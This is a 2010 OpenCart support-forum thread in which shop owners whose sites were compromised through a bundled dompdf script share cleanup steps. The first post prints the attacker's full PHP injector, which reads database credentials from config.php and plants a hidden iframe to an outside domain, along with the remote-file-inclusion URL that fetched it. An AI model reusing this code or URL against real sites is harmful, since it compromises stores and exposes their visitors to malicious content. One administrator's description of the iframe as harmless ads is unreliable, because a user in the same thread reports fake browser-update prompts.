Post by bryngerard » Sun Apr 11, 2010 12:33 pm

Hi all,

Inspecting my access logs revealed that a site had accessed my shop using the following URL:

/artshop/upload/system/helper/dompdf/dompdf.php?input_file=http://musorka.cn.zp.ua/cfg/conf.txt

Here is the injected code:

Code: Select all

<?php
/*********************************************/
$INJ = '<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>';
/*********************************************/

error_reporting(0);
function findconfig($dir) {
	if ($dh = opendir($dir)) {
		while (($item = readdir($dh)) !== false) {
			if($item != "." && $item != "..") {
				if(is_file($dir . $item) && $item == 'config.php') {
					@include $dir . $item;
					if(defined('DB_HOSTNAME')) {
						return $dir . $item;
					}
				}
			}
		}
		closedir($dh);
		return findconfig($dir . "../");
	}	
}

function halt($str) {
	echo $str;
	unlink('conf.php');
	die;
}

if(!findconfig("./")) {
	halt("<resp>[-] Could not find config.php</resp>");
}

if(!mysql_connect(DB_HOSTNAME, DB_USERNAME, DB_PASSWORD)) {
	halt("<resp>[-] Could not connect to DB</resp>");
}

if(!mysql_select_db(DB_DATABASE)) {
	halt("<resp>[-] Could not select DB</resp>");
}

$q   = mysql_query("SELECT value FROM " . DB_PREFIX . "setting WHERE `key` = 'config_template' LIMIT 1");
$tpl = mysql_result($q, 0, "value");
if(!$tpl) {
	$q   = mysql_query("SELECT value FROM setting WHERE `key` = 'config_template' LIMIT 1");
	$tpl = mysql_result($q, 0, "value");
	if($tpl) {
		define('PREFIX', '');
	} else {
		halt("<resp>[-] Could not retrieve theme</resp>");
	}
} else {
	define('PREFIX', DB_PREFIX);
}

$footer1 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/common/footer.tpl";
$footer2 = DIR_SYSTEM . "/../catalog/view/theme/" . $tpl . "/template/common/footer.tpl";
if(file_exists($footer1)) {
	$footer = $footer1;
} elseif(file_exists($footer2)) {
	$footer = $footer2;
} else {
	$footer = false;
}

if(!$footer || !is_writable($footer)) {
	$q = mysql_query("SELECT `key` FROM " . PREFIX . "setting WHERE `key` = 'config_welcome_1' OR `key` = 'config_description_1' OR `key` = 'config_description_1' LIMIT 1");
	$c = mysql_result($q, 0, "key");
	$q = mysql_query("SELECT value FROM " . PREFIX . "setting WHERE `key` = '$c' LIMIT 1");
	$v = mysql_result($q, 0, "value");
	$r = mysql_query("UPDATE " . PREFIX . "setting SET value = '".addslashes($v . $INJ)."'  WHERE `key` = '$c' LIMIT 1");
	if($r) {
		halt("<resp>[+] Injected! (db)</resp>");
	} else {
		halt("<resp>[-] Could not update db</resp>");
	}
} else {
	$fp = fopen($footer, 'a');
	if($fp) {
		fputs($fp, $INJ);
		fclose($fp);
		halt("<resp>[+] Injected! (file)</resp>");
	} else {
		halt("<resp>[-] Could not write to file</resp>");
	}
}
unlink('conf.php');
die;
Can anyone say what this code does?

Bryn

Newbie

Posts

Joined
Wed Feb 17, 2010 1:09 am

Post by Qphoria » Sun Apr 11, 2010 1:05 pm

This issue was addressed a few days ago.
OpenCart 1.4.6 Update

The script looks like it tries to add iframe code to the dompdf file
to goto this address:

Code: Select all

http://adsanalytics.net/in.cgi?2
Which I assume is just to show some ads on your site.

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by bryngerard » Mon Apr 12, 2010 5:09 am

Thanks very much :)

Newbie

Posts

Joined
Wed Feb 17, 2010 1:09 am

Post by bryngerard » Mon Apr 12, 2010 7:37 pm

Interesting, my shop now connects to http://adsanalytics.net/ whenever a user loads the page.

I am also getting a JScript dialog box telling me my browser is out ofdate and that I should click to upgrade.
This does not happen everytime so it could be related to something else but it is recent phenomenon.

There are five embedded Iframes pointing to http://adsanalytics.net/in.cgi?nn

Does anyone know how to get rid of them?

http://bryngerard.com/artshop/upload for anyone who wants to have alook although you may be exposing yourself to infection if you visit it. I guess I have to take the shop off-line :(

Regds
Bryn

Newbie

Posts

Joined
Wed Feb 17, 2010 1:09 am

Post by bryngerard » Mon Apr 12, 2010 8:09 pm

I believe tracked this down.

The file that gets hacked is /upload/catalog/view/theme/template/YourTemplateName/common/footer.tpl

If you have been hacked, the timestamp for the file will be the day that it happened.

I didn't edit the file although I have a copy of it if anyone wants it. I just overwrote it with an original copy from the dist. zip. and all *seems* to be OK.

Regards,

Bryn

Newbie

Posts

Joined
Wed Feb 17, 2010 1:09 am

Post by Daniel » Mon Apr 12, 2010 8:28 pm

everyone needs to delete dompdf. its a 3rd party script that i included to generate pdf invoices. just remove it. it will not affect the running of your store.

OpenCart®
Project Owner & Developer.


User avatar
Administrator

Posts

Joined
Fri Nov 03, 2006 6:57 pm

Post by Qphoria » Mon Apr 12, 2010 9:06 pm

It wasn't in footer.tpl for me. The code injected into my welcome message. I had 4 instances in my welcome message. To find it, goto your system settings page and edit your welcome message in SOURCE mode.
Find all instances of

Code: Select all

<iframe width=0 height=0 style=\'display:none\' src="http://adsanalytics.net/in.cgi?2"></iframe>
and remove them

Be sure you remove the system/helper/dompdf/dompdf.php file first to avoid it re-adding

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by bryngerard » Mon Apr 12, 2010 9:55 pm

It seems that they(the script) have multile behaviors. I didn't have any in the Welcome!

Anyway, it doesn't seem diff. to disinfect. I checked each page using firebug and I can't find any more.

Bryn

Newbie

Posts

Joined
Wed Feb 17, 2010 1:09 am

Post by ohmohm » Tue Apr 13, 2010 2:16 am

Site visitors will be infected, or not? Especially spyware that steals Paypal account.

Newbie

Posts

Joined
Tue Apr 13, 2010 1:11 am

Post by twiggy » Tue Apr 13, 2010 2:41 am

Very worrying, I have been hit by this and I'm on version 1.3.4 which is considered a stable version. Hopefully google will not penalise my site for this.

Would it be easy to update from 1.3.4 up to 1.4.7?

Active Member

Posts

Joined
Fri Aug 14, 2009 4:43 am


Post by Qphoria » Tue Apr 13, 2010 2:55 am

as i said, it only puts an iframe on your site that displays ads. relatively harmless and affects nothing outside of the site. Just delete that dompdf file and remove the iframe code from either the footer or the welcome message and you'll be fine

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by bryngerard » Tue Apr 13, 2010 5:55 am

I feel must say that despite all this I am still impressed with Open Cart and this Forum.

This kind of thing happens all of the time, entire teams of bright people are employed to look for these weaknesses and exploit them.

Eternal vigilance is the keyword for Internet :)

Bryn

Newbie

Posts

Joined
Wed Feb 17, 2010 1:09 am

Post by Qphoria » Tue Apr 13, 2010 5:59 am

The important thing to note is that this is not an OpenCart issue. It is the "dompdf" public library script.
http://code.google.com/p/dompdf

OpenCart just chose to use this particular library for upcoming pdf projects. It was just an unlucky choice from the many different pdf scripts available. We will look into a different pdf library class in the future

Image
Donate!|OpenCart Basics|GeoZones
Image


User avatar
Administrator

Posts

Joined
Tue Jul 22, 2008 3:02 am

Post by maema » Sun Apr 18, 2010 4:25 pm

Hello..

was on my footer.tpl

But how this can be happend...
Should i change password somewhere ?
FTP OPENCART... ?

New member

Posts

Joined
Fri Nov 27, 2009 3:38 am

Post by i2Paq » Sun Apr 18, 2010 4:38 pm

maema wrote:Hello..

was on my footer.tpl

But how this can be happend...
Should i change password somewhere ?
FTP OPENCART... ?
Everything you need to know you find: Here.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by maema » Sun Apr 18, 2010 4:58 pm

THX A LOT !
I was really worried... now dompdf folder is removed FOR EVER !

but who made the dompdf source... ? there is any other potential stuff for hacking ?

New member

Posts

Joined
Fri Nov 27, 2009 3:38 am

Post by i2Paq » Sun Apr 18, 2010 5:03 pm

maema wrote:THX A LOT !
I was really worried... now dompdf folder is removed FOR EVER !

but who made the dompdf source... ? there is any other potential stuff for hacking ?
OpenCart is extremely safe, so no worries there.

If you follow the link in the topic I pointed you to you can read all about dompdf.

Norman in 't Veldt
Moderator OpenCart Forums

_________________ READ and Search BEFORE POSTING _________________

Our FREE search: Find your answer FAST!.

[How to] BTW + Verzend + betaal setup.


User avatar
Global Moderator

Posts

Joined
Mon Nov 09, 2009 7:00 pm
Location - Winkel - The Netherlands

Post by sunbedman » Sun Apr 25, 2010 4:53 am

had it on my site to but google had seen it as well and put This site may harm your computer. on the search eng. :'(
so iv had to go back to google and see if will remove it.
Nice work to you all ;D

Newbie

Posts

Joined
Tue Mar 16, 2010 8:04 pm
Location - Bolton, Manchester, UK
Who is online

Users browsing this forum: No registered users and 64 guests